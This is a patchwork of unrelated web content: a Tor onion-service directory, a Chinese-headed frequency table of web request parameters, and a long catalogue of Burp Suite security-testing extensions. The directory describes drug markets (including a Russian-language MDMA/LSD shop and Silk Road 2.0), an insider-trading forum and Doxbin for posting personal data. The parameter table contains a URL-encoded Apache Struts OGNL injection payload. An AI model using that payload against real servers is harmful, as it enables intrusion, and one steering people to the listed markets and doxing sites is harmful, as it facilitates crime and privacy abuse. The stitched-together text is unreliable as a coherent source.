TorBox – This is a hidden mailbox service only accessible from TOR without connection with public internet.
BitMessage – Connects bitmessage and e-mail services. Registration only available using the clearweb link.
Protonmail – Swiss based e-mail service, encrypts e-mails locally on your browser. Free and paid accounts.
Connect
– Connect is a collective that recognizes and promotes anticapitalism,
antiracism, antifascism, antisexism, antimililtarism, and
anti-what-the-fuck-ever and the refusal of authoritarianism and
hierarchies.
Galaxy3 – Galaxy3 is a new, Social Networking experience for the darknet!
Torbook 2.0 – The Facebook of Tor. Share your memories, connect with others and make friends.
Facebook – The real Facebook’s Onion domain. Claim not to keep logs. Trust them at your peril.
Forums / Boards / Chans
The Stock Insiders
– The Oldest and the Largest Insider Trading Forum. The community for
exchanging Insider Information about the Publicly Traded Companies.
The Intel Exchange – Know or need to know something? Ask and share at this underground intelligence gathering network.
DNM Avengers – Darknet drug forum with reviews and marketplace discussion.
OnionLand – Discussion forum about all the Darkweb markets related topics.
WikiLeaks DeepWeb mirror of the famous Wikileaks website
Doxbin – A pastebin for personally identifiable information.
SecureDrop – The open-source whistleblower submission system managed by Freedom of the Press Foundation.
Active at Darknet Markets?
– Onion set up by the Police and the Judicial Authorities of the
Netherlands, listing Active, identified, and arrested Darknet Market
operators.
Cryptome
– Archive Government Leaks. Documents for publication that are
prohibited by governments worldwide, in particular material on freedom
of expression, privacy, cryptology, dual-use technologies, national
security, intelligence, and secret governance — open, secret and
classified documents — but not limited to those
SecureDrop
– An open-source whistleblower submission system that media
organizations can use to securely accept documents from and communicate
with anonymous sources.
darknet design — web design (HTML, CSS, PHP) plus graphics design and a few other things.
Daniel’s Hosting
– Solution d’hébergement gratuite uniquement pour un projet personnel
non commercial. Possibilité payer pour plus de contrôle. Support
réactif.
Зеркало библиотеки Траума – Бесплатная библиотека. Обложки, поиск и возможность скачивать в форматах FB2, HTML и TXT.
РосПравосудие
– крупнейшая картотека юристов, адвокатов, судей и судебных решений
(50+ миллионов документов, 35+ тысяч судей, 65+ тысяч адвокатов, сотни
тысяч юристов, прокуроры). «РосПравосудие» – аполитичный и независимый
проект.
China Market
– китайский маркет. Всегда свежие поставки из Китая: каннабиноиды, MDMA
кристаллы, экстази, LSD. Доставка без пересечения границы, есть
представители в России, Украине и Казахстане. Автоматическое оформление,
оплата и получение заказа. Методы оплаты: Bitcoin, Qiwi, Приват24,
наличкой через терминалы.
Volunteers last verified that all services in this section were up,
or marked as DOWN, on: 2011-06-08
For configuration and service/uptime testing, all services in this
section MUST list the active port in their address. Exception: HTTP on
80, HTTPS on 443.
For help with configuration, see the TorifyHOWTO and End-to-end connectivity issues.
P2P FileSharing
Running P2P protocols within Tor requires OnionCat. Therefore, see the OnionCat section for those P2P services.
IMPORTANT: It is possible to use Tor for P2P. However, if you do, the right thing must also be done by giving back the bandwidth used. Otherwise, if this is not done, Tor will be crushed taking everyone along with it.
Some people and their usual server hangouts may be found in the Contact Directory.
IRC
Use e.g. ChatZilla add-on for the IRC protocol (the Tor Project does not suggest installing browser addons unless you understand the risks), or a standalone client such as HexChat. Tails comes with Pidgin, which will work for IRC as well.
All of these direct to zelazny.freenode.net and allow plaintext port 6667 as well as SSL ports 6697, 7000, and 7070.
Below is a list of DEAD irc servers from Anonet:
AnoNet – Each server is on its own network and connects to a chat cloud
irc1.srn.ano, clearnet
elef7kcrczguvamt.onion:15783 – Direct access to the AnoNet chat cloud. Use an IRC server to connect.
irc3.srn.anoirc2.srn.ano, clearnet – Still connects to the old AnoNet chat cloud; that will soon change.
irc4.srn.anoirc.cananon.ano Web Chat Version join #Anonet
SILC
fxb4654tpptq255w.onion:706 – SILCroad, public server. [discuss/support]
<protect>Silkroad 2.0 – The new silkroad. Biggest marketplace for drugs on the Darknet. (Bitcoin)</protect>
kissonmbczqxgebw.onion:10000 – KISS.onion – Keep It Simple and Safe –
ditch the web browser, use SILC to communicate securely (using Pidgin with OTR)
Humans are listed in the above contact directory. Bots are listed below.
7oj5u53estwg2pvu.onion:11009 – TorChat InfoServ #2nd, by ACS.
gfxvz7ff3bzrtmu4.onion:11009 – TorChat InfoServ #1st, by ACS…
SFTP – SSH File Transfer Protocol
These SFTP clients work with Tor: WinScp, FileZilla. Set proxy to SOCKS5, host 127.0.0.1, port 9150 (Windows,Mac) or 9050 (Linux). Encrypt your sensitive files using GnuPG before uploading them to any server.
Do not simply remove services that appear to be offline from the above list! Services can go down temporarily, so we keep track of when they do and maintain a list of dead hidden services.
In addition to an onion simply being gone (Tor cannot resolve
the onion), sites that display 404 (and use a known onion/URL based
hosting service) are the only other thing that is considered truly DOWN.
Presumably the account is gone.
If a service has been down for a while, tag it with ‘ – DOWN YYYY-MM-DD’ (your guess as to when it went down).
If a tagged service on the above list of live hidden services has come back up, remove the DOWN tag.
If a tagged service is still down after a month, please move it (along with the DOWN tag) to the list of dead hidden services.
The general idea of the remaining four service states below is
that, if the Hidden Service Descriptor is available, and something is
responding behind it… the service is considered up, and we track that
fact on the Main Page. If any of these subsequently go offline, append
the DOWN tag and handle as above.
Hello world’s / statements, minimal sites, services with low user activity, etc (while boring)… are listed as usual.
Broken services are those that display 404 (and do not use a known
hosting service), PHP or other errors (or they fail silently)… any of
which prevent the use of the service as intended. They also include
blank pages, empty dirs and neglected status notes. Presumably the
operator is in limbo. Broken services are tagged with ‘ (reason) –
Broken YYYY-MM-DD’ (your guess as to when it went broken)
Services that automatically redirect to another service (such as by
HTTP protocol or script), have their redirection destinations noted in
their descriptions. These are tagged with ‘ – Redir YYYY-MM-DD’ (your
guess as to when it went redir)
Sites that are formally closed via announcement are tagged with ‘ – Closed YYYY-MM-DD’ (your guess as to when it went closed.
Is Online that HiddenService? This service is very useful in determining whether onions are up or not. It also gives a reason why they are down.
Sites on this list that have no chance of coming back (LE takedowns, dead for some time) should be archived to page dead services just in case they should ever be needed.
参数 出现次数
id 6845
action 1643
type 1503
m 1013
a 992
c 855
act 829
page 813
uid 616
url 585
method 545
cid 545
ID 528
mod 521
aid 490
keyword 474
key 449
t 449
q 444
callback 427
sid 426
s 421
name 407
tid 399
pid 392
code 354
r 316
p 307
file 301
Type 294
do 294
redirect 292
username 291
_ 278
op 259
filename 252
path 251
from 230
classid 227
f 222
fid 221
app 213
cmd 213
typeid 203
_FILES 201
ac 194
title 192
fileName 191
userid 190
v 189
flag 176
catid 170
Connector 166
bid 158
order 150
wd 150
mid 150
lang 145
nid 143
city 142
CurrentFolder 139
newsid 138
Command 137
password 131
d 128
source 127
sort 126
user 125
token 122
module 120
class 118
userId 115
dir 113
ie 111
Id 108
pwd 107
num 106
email 103
appid 102
u 102
mobile 102
i 102
keywords 100
version 100
status 99
gid 99
typeArr 96
g 96
service 95
o 95
ArticleID 94
query 94
filePath 94
orderId 94
redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 93
category 92
word 92
user_id 92
k 91
channel 90
CSRF Scanner – CSRF Scanner Extension for Burp Suite Pro.
HTML5 Auditor – This extension checks for usage of HTML5 features that have potential security risks.
Software Version Reporter – Burp extension to passively scan for applications revealing software version numbers.
J2EEScan – J2EEScan is a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications.
Java Deserialization Scanner – All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities.
CSP Bypass – A Burp Plugin for Detecting Weaknesses in Content Security Policies.
Burp Sentinel – GUI Burp Plugin to ease discovering of security holes in web applications.
Collaborator Everywhere – A Burp Suite Pro extension which augments your proxy traffic by injecting non-invasive headers designed to reveal backend systems by causing pingbacks to Burp Collaborator
Burp Retire JS – Burp/ZAP/Maven extension that integrate Retire.js repository to find vulnerable Javascript libraries.
SOMEtime – A BurpSuite plugin to detect Same Origin Method Execution vulnerabilities.
HTTPoxy Scanner – A Burp Suite extension that checks for the HTTPoxy vulnerability.
ParrotNG – ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461.
Error Message Checks – Burp Suite extension to passively scan for applications revealing server error messages.
Identity Crisis – A Burp Suite extension that checks if a particular URL responds differently to various User-Agent headers.
CSP Auditor – Burp and ZAP plugin to analyse Content-Security-Policy headers or generate template CSP configuration from crawling a Website/
Burp Suite GWT Scan – Burp Suite plugin identifies insertion points for GWT (Google Web Toolkit) requests.
Minesweeper – A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 14000+ malicious cryptocurrency mining domains (cryptojacking).
Yara – This extension allows you to perform on-demand Yara scans of websites within the Burp interface based on custom Yara rules that you write or obtain.
WordPress Scanner – Find known vulnerabilities in WordPress plugins and themes using WPScan database.
Length Extension Attacks – his extension lets you perform hash length extension attacks on weak signature mechanisms.
Headers Analyzer – This extension adds a passive scan check to report security issues in HTTP headers.
Heartbleed – This extension adds a new tab to Burp’s Suite main UI allowing a server to be tested for the Heartbleed bug. If the server is vulnerable, data retrieved from the server’s memory will be dumped and viewed.
Image Size Issues – This extension passively detects potential denial of service attacks due to the size of an image being specified in request parameters.
CMS Scanner – An active scan extension for Burp that provides supplemental coverage when testing popular content management systems.
Detect Dynamic JS – This extension compares JavaScript files with each other to detect dynamically generated content and content that is only accessible when the user is authenticated.
CTFHelper – This extension will scan some sensitive files (backup files likes .index.php.swp or .git directory) in web server that makes solving CTF challenge faster.
Broken Link Checker – This extension discovers the broken links passively could be handy in second order takeovers.
Scan manual insertion point – This Burp extension lets the user select a region of a request (typically a parameter value), and via the context menu do an active scan of just the insertion point defined by that selection.
AdminPanelFinder – A burp suite extension that enumerates infrastructure and application Admin Interfaces (OWASP OTG-CONFIG-005).
HTTP Request Smuggler – This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research. It supports scanning for Request Smuggling vulnerabilities, and also aids exploitation by handling cumbersome offset-tweaking for you.
JS Link Finder – Burp Extension for a passively scanning JavaScript files for endpoint links. – Export results the text file – Exclude specific ‘js’ files e.g. jquery, google-analytics.
iRule Detector – Detect a Remote Code or Command Execution (RCE) vulnerability in some implementations of F5 Networks’ popular BigIP load balancer.
Burp AEM Security Scanner Extension – Burp AEM Security Scanner is an AEM focussed plugin which supports the evaluation of well known misconfigurations of AEM installations.
FlareQuench – Burp Suite plugin that adds additional checks to the passive scanner to reveal the origin IP(s) of Cloudflare-protected web applications.
Custom Features
Extensions related to customizing Burp features and extend the functionality of Burp Suite in numerous ways.
Burp Bounty – Scan Check Builder – This BurpSuite extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface.
Scan Manual Insertion Point – This Burp extension lets the user select a region of a request (typically a parameter value), and via the context menu do an active scan of just the insertion point defined by that selection.
Distribute Damage – Designed to make Burp evenly distribute load across multiple scanner targets, this extension introduces a per-host throttle and a context menu to trigger scans from.
Add & Track Custom Issues – This extension allows custom scan issues to be added and tracked within Burp.
Decoder Pro – Burp Suite Plugin to decode and clean up garbage response text.
Decoder Improved – Decoder Improved is a data transformation plugin for Burp Suite that better serves the varying and expanding needs of information security professionals.
Request Highlighter – Request Highlighter is a simple extension for Burp Suite tool (for both community and professional editions) that provides an automatic way to highlight HTTP requests based on headers content (eg. Host, User-Agent, Cookies, Auth token, custom headers etc.).
Request Minimizer – This extension performs HTTP request minimization. It deletes parameters that are not relevant such as: random ad cookies, cachebusting nonces, etc.
Wildcard – There is number of great Burp extension out there. Most of them create their own tabs.
Hackvertor – Hackvertor is a tag-based conversion tool that supports various escapes and encodings including HTML5 entities, hex, octal, unicode, url encoding etc.
Multi-Browser Highlighting – This extension highlights the Proxy history to differentiate requests made by different browsers. The way this works is that each browser would be assigned one color and the highlights happen automatically.
Manual Scan Issues – This extension allows users to manually create custom issues within the Burp Scanner results.
Handy Collaborator – Handy Collaborator is a Burp Suite Extension that lets you use the Collaborator tool during manual testing in a comfortable way.
BadIntent – Intercept, modify, repeat and attack Android’s Binder transactions using Burp Suite.
Custom Send-To – Adds a customizable “Send to…”-context-menu to your BurpSuite.
IPRotate Burp Extension – Extension for Burp Suite which uses AWS API Gateway to rotate your IP on every request.
Timeinator – Timeinator is an extension for Burp Suite that can be used to perform timing attacks over an unreliable network such as the internet.
Auto-Drop Requests – Burp extension to automatically drop requests that match a certain regex.
Scope Monitor – A Burp Suite Extension to monitor and keep track of tested endpoints.
Taborator – Improved Collaborator client in its own tab.
pip3line – Raw bytes manipulation utility, able to apply well known and less well known transformations.
Auto Drop – This extension allows you to automatically Drop requests that match a certain regex. Helpful in case the target has logging or tracking services enabled.
Beautifiers and Decoders
Extensions related to beautifying and decoding data formats.
.NET Beautifier – A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE).
JCryption Handler – This extension provides a way to perform manual and/or automatic Security Assessment for Web Applications that using JCryption JavaScript library to encrypt data sent through HTTP methods (GET and POST).
JSWS Parser – This extension can be used to parse a response containing a JavaScript Web Service Proxy (JSWS) and generate JSON requests for all supported methods.
JSON Decoder – This extension adds a new tab to Burp’s HTTP message editor, and displays JSON messages in decoded form.
MessagePack – This extension supports: decoding MessagePack requests and responses to JSON format, converting requests from JSON format to MessagePack.
Fast Infoset Tester – This extension converts incoming Fast Infoset requests and responses to XML, and converts outgoing messages back to Fast Infoset.
BurpAMFDSer – BurpAMFDSer is a Burp plugin that will deserialze/serialize AMF request and response to and from XML with the use of Xtream library.
Deflate Burp Plugin – The Deflate Burp Plugin is a plug-in for Burp Proxy (it implements the IBurpExtender interface) that decompresses HTTP response content in the ZLIB (RFC1950) and DEFLATE (RFC1951) compression formats.
Cyber Security Transformation Chef – The Cyber Security Transformation Chef (CSTC) is a Burp Suite extension. It is build for security experts to extend Burp Suite for chaining simple operations for each incomming or outgoing message.
GraphQL Raider – GraphQL Raider is a Burp Suite Extension for testing endpoints implementing GraphQL.
JSONPath – Burp Suite extension to view and extract data from JSON responses.
Cloud Security
Plugins related to assessing Cloud Security services such as Amazon AWS.
AWS Security Checks – This extensions provides additional Scanner checks for AWS security issues.
AWS Extender – AWS Extender (Cloud Storage Tester) is a Burp plugin to assess permissions of cloud storage containers on AWS, Google Cloud and Azure.
Python Scripter – This extension allows execution of a custom Python script on each HTTP request and response processed by Burp.
Burpkit – BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically.
Burp Requests – Copy as requests plugin for Burp Suite.
Burpy – Portable and flexible web application security assessment tool.It parses Burp Suite log and performs various tests depending on the module provided and finally generate a HTML report.
Buby – A JRuby implementation of the BurpExtender interface for PortSwigger Burp Suite.
Burpee – Python object interface to requests/responses recorded by Burp Suite.
Burp Buddy – burpbuddy exposes Burp Suites’s extender API over the network through various mediums, with the goal of enabling development in any language without the restrictions of the JVM.
Copy As Python-Requests – This extension copies selected request(s) as Python-Requests invocations.
Copy as Node Request – This extension copies the selected request(s) as Node.JS Request invocations.
Copy as JavaScript Request – This Burp Extension copies the selected request to the clipboard as JavaScript Fetch API.
BReWSki – BReWSki (Burp Rhino Web Scanner) is a Java extension for Burp Suite that allows user to write custom scanner checks in JavaScript.
OAuth and SSO
Extensions for assessing Single sign-on (SSO) and OAuth related applications.
SAML Raider – SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: Manipulating SAML Messages and manage X.509 certificates.
Burp OAuth – OAuth plugin for Burp Suite Extender.
EsPReSSO – An extension for BurpSuite that highlights SSO messages in Burp’s proxy window..
SAML Encoder/Decoder – This extension adds a new tab to Burp’s main UI, allowing encoding and decoding of SAML (Security Assertion Markup Language) formatted messages.
SAML Editor – This extension adds a new tab to Burp’s HTTP message editor, allowing encoding and decoding of SAML (Security Assertion Markup Language) formatted messages.
JSON Web Token Attacker – This extension helps to test applications that use JavaScript Object Signing and Encryption, including JSON Web Tokens.
JSON Web Tokens – This extension lets you decode and manipulate JSON web tokens on the fly, check their validity and automate common attacks against them.
AuthHeader Updater – Burp extension to specify the token value for the Authenication header while scanning.
Dupe Key Injector – Dupe Key Injetctor is a Burp Suite extension implementing Dupe Key Confusion, a new XML signature bypass technique presented at BSides/BlackHat/DEFCON 2019 “SSO Wars: The Token Menace” presentation.
SAMLReQuest – Enables you to view, decode, and modify SAML requests and responses.
Information Gathering
Extensions related to Discovery, Spidering and Information Gathering.
Google Hack – This extension provides a GUI interface for setting up and running Google Hacking queries, and lets you add results directly to Burp’s site map..
PwnBack/Wayback Machine – Burp Extender plugin that generates a sitemap of a website using Wayback Machine.
Site Map Extractor – This extension extracts information from the Site Map. You can use the full site map or just in-scope items.
Site Map Fetcher – This extension fetches the responses of unrequested items in the site map.
Burp CSJ – This extension integrates Crawljax, Selenium and JUnit together. The intent of this extension is to aid web application security testing, increase web application crawling capability and speed-up complex test-cases execution.
Attack Surface Detector – The Attack Surface Detector uses static code analyses to identify web app endpoints by parsing routes and identifying parameters.
domain_hunter – A Burp Suite extender that try to find sub-domains,similar domains and related domains of an organization, not only domain.
BigIP Discover – A extension of Burp suite. The cookie set by the BipIP server may include a private IP, which is an extension to detect that IP
AdminPanelFinder – A burp suite extension that enumerates infrastructure and application Admin Interfaces (OWASP OTG-CONFIG-005).
Asset Discover – Burp Suite extension to discover assets from HTTP response using passive scanning.
DirectoryImporter – This is a Burpsuite plugin built to enable you to import your directory bruteforcing results into burp for easy viewing later.
Dr. Watson – Dr. Watson is a simple Burp Suite extension that helps find assets, keys, subdomains, IP addresses, and other useful information.
Vulnerability Specific Extensions
Cross-site scripting
XSS Validator – This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities.
burp-xss-sql-plugin – Publishing plugin which I used for years which helped me to find several bugbounty-worthy XSSes, OpenRedirects and SQLi.
DOM XSS Checks – This Burp Suite plugin passively scans for DOM-Based Cross-Site Scripting.
Reflector – Burp plugin able to find reflected XSS on page in real-time while browsing on site
BitBlinder – Burp extension helps in finding blind xss vulnerabilities
JavaScript Security Burp Extension – A Burp Suite extension which performs checks for cross-domain scripting against the DOM, subresource integrity checks, and evaluates JavaScript resources against threat intelligence data.
Reflected Parameters – This extension monitors traffic and looks for request parameter values (longer than 3 characters) that are reflected in the response.
BitBlinder – Burp extension helps in finding blind xss vulnerabilities.
jsonp – jsonp is a Burp Extension which attempts to reveal JSONP functionality behind JSON endpoints. This could help reveal cross-site script inclusion vulnerabilities or aid in bypassing content security policies.
Server-Side-Request-Forgery
Broken Access Control
Burplay/Multi Session Replay – Burplay is a Burp Extension allowing for replaying any number of requests using same modifications definition. Its main purpose is to aid in searching for Privilege Escalation issues.
AuthMatrix – AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services.
Autorize – Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily in order to ease application security people work and allow them perform an automatic authorization tests.
AutoRepeater – Automated HTTP Request Repeating With Burp Suite.
Authz – Burp plugin to test for authorization flaws.
Paramalyzer – Paramalyzer – Burp extension for parameter analysis of large-scale web application penetration tests.
Burp SessionAuth – Burp plugin which supports in finding privilege escalation vulnerabilities.
Auto Repeater – This extension automatically repeats requests, with replacement rules and response diffing. It provides a general-purpose solution for streamlining authorization testing within web applications.
IncrementMe Please – Burp extension to increment a parameter in each active scan request.
Cross-Site Request Forgery
CSRF Scanner – CSRF Scanner Extension for Burp Suite Pro.
CSurfer – CSurfer is a CSRF guard hiding extension that keeps track of the latest guard value per session and update new requests accordingly.
Match/Replace Session Action – This extension provides match and replace functionality as a Session Handling Rule.
Token Extractor – This extension allows tokens to be extracted from a response and replaced in requests.
CSRF Token Tracker – This extension provides a sync function for CSRF token parameters.
Token Rewrite – This extension lets you search for specific values like CSRF tokens in responses and use their values to modify parameters in future requests or set a cookie.
CustomDeserializer – This extension speeds up manual testing of web applications by performing custom deserialization.
BurpJDSer – BurpJDSer is a Burp plugin that will deserialze/serialize Java request and response to and from XML with the use of Xtream library.
Sensitive Data Exposure
Burp Smart Buster – A Burp Suite content discovery plugin that add the smart into the Buster!.
PDF Metadata – The PDF Metadata Burp Extension provides an additional passive Scanner check for metadata in PDF files.
SpyDir – BurpSuite extension to assist with Automated Forced Browsing/Endpoint Enumeration.
Burp Hash – Many applications will hash parameters such as ID numbers and email addresses for use in secure tokens, like session cookies.
Param Miner – This extension identifies hidden, unlinked parameters. It’s particularly useful for finding web cache poisoning vulnerabilities.
MindMap Exporter – Aids with documentation of the following OWASP Testing Guide V4 tests: OTG-INFO-007: Map execution paths through application, OTG-INFO-006: Identify application entry points.
Image Location & Privacy Scanner – Passively scans for GPS locations or embedded privacy related exposure (like camera serial numbers) in images during normal security assessments of websites via a Burp plug-in.
Image Metadata – This extension extract metadata present in image files. The information found is rarely critical, but it can be useful for general reconnaissance. These information can be usernames who created the files, local paths and technologies used.
ExifTool Scanner – This Burp extension reads metadata from various filetypes (JPEG, PNG, PDF, DOC, XLS and much more) using ExifTool. Results are presented as Passive scan issues and Message editor tabs.
Interesting Files Scanner – Interesting Files Scanner extends Burp Suite’s active scanner, with scans for interesting files and directories. A main feature of the extension is the check for false positives with tested patterns for each case.
BeanStack – Stack-trace Fingerprinter – Java Fingerprinting using Stack Traces. Note that this extension sends potentially private stack-traces to a third party for processing.
Directory Importer – This is a Burpsuite plugin for importing directory bruteforcing results into Burp for futher analysis.
JS Link Finder – Burp Extension for a passively scanning JavaScript files for endpoint links. – Export results the text file – Exclude specific ‘js’ files e.g. jquery, google-analytics.
SQL Injection
CO2 – A collection of enhancements for Portswigger’s popular Burp Suite web penetration testing tool.
SQLiPy – SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.
burp-xss-sql-plugin – ublishing plugin which I used for years which helped me to find several bugbounty-worthy XSSes, OpenRedirects and SQLi.
InjectMate – Burp Extension that generates payloads for XSS, SQLi, and Header injection vulns
Burptime – Show time cost in burp proxy history, it’s useful when testing time-based sql injection..
XXE
Office OpenXML Editor – Burp extension that add a tab to edit Office Open XML document (xlsx,docx,pptx).
Content Type Converter – Burp extension to convert XML to JSON, JSON to XML, x-www-form-urlencoded to XML, and x-www-form-urlencoded to JSON.
Insecure File Uploads
Upload Scanner – A Burp Suite Pro extension to do security tests for HTTP file uploads.
ZIP File Raider – Burp Extension for ZIP File Payload Testing.
File Upload Traverser – This extension verifies if file uploads are vulnerable to directory traversal vulnerabilities.
Directory Traversal
Uploader – Burp extension to test for directory traversal attacks in insecure file uploads.
off-by-slash – Burp extension to detect alias traversal via NGINX misconfiguration at scale.
Session Management
WAFDetect – This extension passively detects the presence of a web application firewall (WAF) from HTTP responses.
TokenJar – This extension provides a way of managing tokens like anti-CSRF, CSurf, Session IDs.
Token Incrementor – A simple but useful extension to increment a parameter in each request, intended for use with Active Scan.
Token Extractor – This extension allows tokens to be extracted from a response and replaced in requests.
Session Auth – This extension can be used to identify authentication privilege escalation vulnerabilities.
Session Timeout Test – This extension attempts to determine how long it takes for a session to timeout at the server.
Session Tracking Checks – This extension checks for the presence of known session tracking sites.
ExtendedMacro – This extension provides a similar but extended version of the Burp Suite macro feature.
AuthHeader Updater – Burp extension to specify the token value for the Authenication header while scanning.
Request Randomizer – This extension registers a session handling rule which places a random value into a specified location within requests.
BearerAuthToken – This burpsuite extender provides a solution on testing Enterprise applications that involve security Authorization tokens into every HTTP requests.
Burp Wicket Handler – Used as part of Burps Session Handling, Record a Macro which just gets the page you want to submit
Add Request to Macro – This Burp extension lets you add a request to an existing macro.
Cookie Decrypter – A Burp Suite Professional extension for decrypting/decoding various types of cookies.
Argument Injection Hammer – it is used to identify argument injection vulnerabilities, like curlawk etc, and sth just like these
Template Injection
tplmap Burp Extenson – Burp extension for Tplmap, a Server-Side Template Injection and Code Injection Detection and Exploitation Tool
Web Application Firewall Evasion
The following extensions can aid during WAF evasion.
Bypass Waf – Add headers to all Burp requests to bypass some WAF products.
Random IP Address Header – This extension automatically generates IPV6 and IPV4 fake source address headers to evade WAF filtering.
Burp Suite HTTP Smuggler – A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques.
What-The-WAF – This extension adds a custom payload type to the Intruder tool, to help test for bypasses of Web Application Firewalls (WAFs).
WAF Cookie Fetcher – This extension allows web application security testers to register various types of cookie-related session handling actions to be performed by the Burp session handling rules.
WAFDetect – This extension passively detects the presence of a web application firewall (WAF) from HTTP responses.
LightBulb WAF Auditing Framework – LightBulb is an open source python framework for auditing web application firewalls and filters.
BurpSuiteHTTPSmuggler – A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques.
Extensions related to logging HTTP traffic during assessments and storing Burp traffic.
Burp Notes – Burp Notes Extension is a plugin for Burp Suite that adds a Notes tab. The tool aims to better organize external files that are created during penetration testing..
Logger++ – Burp Suite Logger++: Log activities of all the tools in Burp Suite.
Burp Dump – A Burp plugin to dump HTTP(S) requests/responses to a file system.
Burp Commentator – Generates comments for selected request(s) based on regular expressions.
Burp Suite Importer – Connect to multiple web servers while populating the sitemap.
Burp Replicator – Burp extension to help developers replicate findings from pen tests.
Notes – This extension adds a new tab to Burp’s UI, for taking notes and organizing external files that are created during penetration testing.
Log Requests to SQLite – This extension keeps a trace of every HTTP request that has been sent via BURP, in an SQLite database. This is useful for keeping a record of exactly what traffic a pen tester has generated.
Flow – This extension provides a Proxy history-like view along with search filter capabilities for all Burp tools.
Custom Logger – This extension adds a new tab to Burp’s main UI containing a simple log of all requests made by all Burp tools.
Log Requests to SQLite – BURP extension to record every HTTP request send via BURP and create an audit trail log of an assessment.
Burp Response Clusterer – Burp plugin that clusters responses to show an overview of received responses.
Burp Collect500 – Burp plugin that collects all HTTP 500 messages.
Sink Logger – Sink Logger is a Burp Suite Extension that allows to transparently monitor various JavaScript sinks.
Burp Savetofile – BurpSuite plugin to save just the body of a request or response to a file
Log Viewer – Lets you view log files generated by Burp in a graphical enviroment.
Rapid – A fairly simple Burp Suite extension that enables you to save HTTP Requests and Responses to files a lot faster and in one go.
Payload Generators and Fuzzers
Wordlist/payload generators and fuzzers.
CO2 – A collection of enhancements for Portswigger’s popular Burp Suite web penetration testing tool.
Bradamsa – Burp Suite extension to generate Intruder payloads using Radamsa.
Payload Parser – Burp Extension for parsing payloads containing/excluding characters you provide.
Burp Luhn Payload Processor – A plugin for Burp Suite Pro to work with attacker payloads and automatically generate check digits for credit card numbers and similar numbers that end with a check digit generated using the Luhn algorithm or formula (also known as the “modulus 10” or “mod 10” algorithm)..
Gather Contacts – A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.
Wordlist Extractor – Scrapes all unique words and numbers for use with password cracking.
PsychoPATH – This extension provides a customizable payload generator, suitable for detecting a variety of file path vulnerabilities in file upload and download functionality.
Meth0dMan – This extension helps with testing HTTP methods. It generates custom Burp Intruder payloads based on the site map, allowing quick identification of several HTTP method issues.
Intruder Time Payloads – This extension lets you include the current epoch time in Intruder payloads.
reCAPTCHA – A burp plugin that automatically recognizes the graphics verification code and is used for Payload in Intruder.
Virtual Host Payload Generator – Burp extension providing a set of values for the HTTP request Host header for the Burp Intruder in order to abuse virtual host resolution.
Stepper – Stepper is designed to be a natural evolution of Burp Suite’s Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps.
Turbo Intruder – Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.
burpContextAwareFuzzer – BurpSuite’s payload-generation extension aiming at applying fuzzed test-cases depending on the type of payload (integer, string, path; JSON; XML; GWT; binary) and following encoding-scheme applied originally.
Cryptography
Extensions related to decryption of encrypted traffic and crypto related attacks.
Crypto Attacker – The extension helps detect and exploit some common crypto flaws.
AES Killer – Burp plugin to decrypt AES Encrypted traffic of mobile apps on the fly.
Length Extension Attacks – This extension lets you perform hash length extension attacks on weak signature mechanisms.
TLS-Attacker-BurpExtension – The extension is based on the TLS-Attacker and developed by the Chair for Network and Data Security from the Ruhr-University Bochum to assist pentesters and security researchers in the evaluation of TLS Server configurations with Burp Suite.
Resign v2.0 – A burp extender that recalculate signature value automatically after you modified request parameter value.but you need to know the signature algorithm detail and configure at GUI.
Web Services
Extensions useful for assessing Web Services
WCF-Binary-SOAP-Plug-In – This is a Burp Suite plug-in designed to encode and decode WCF Binary Soap request and response data (“Content-Type: application/soap+msbin1).
WSDL Wizard – WSDL Wizard is a Burp Suite plugin written in Python to detect current and discover new WSDL (Web Service Definition Language) files.
BurpWCFDSer – BurpWCFDSer is a Burp plugin that will deserialze/serialize WCF request and response to and from XML.
JSWS – Burp Extenstion to parse JavaScript WebService Proxies and create sample requests.
JSON Decoder – This extension adds a new tab to Burp’s HTTP message editor, and displays JSON messages in decoded form.
POST2JSON – Burp Suite Extension to convert a POST request to JSON message, moving any .NET request verification token to HTTP headers if present.
WCF Deserializer – This extension allows Burp to view and modify binary SOAP objects.
Postman Integration – This extension integrates with the Postman tool by generating a Postman collection JSON file.
OpenAPI Parser – Parse OpenAPI specifications, previously known as Swagger specifications, into the BurpSuite for automating RESTful API testing – approved by Burp for inclusion in their official BApp Store.
Content Type Converter – Burp extension to convert XML to JSON, JSON to XML, x-www-form-urlencoded to XML, and x-www-form-urlencoded to JSON.
Swurg – Swurg is a Burp Suite extension designed for OpenAPI testing.
WCFDSer-ngng – A Burp Extender plugin, that will make binary soap objects readable and modifiable.
UPnP Hunter – This extension finds active UPnP services/devices and extracts the related SOAP requests (IPv4 and IPv6 are supported), it then analyzes them using any of the various Burp tools (i.e. Intruder, Repeater)
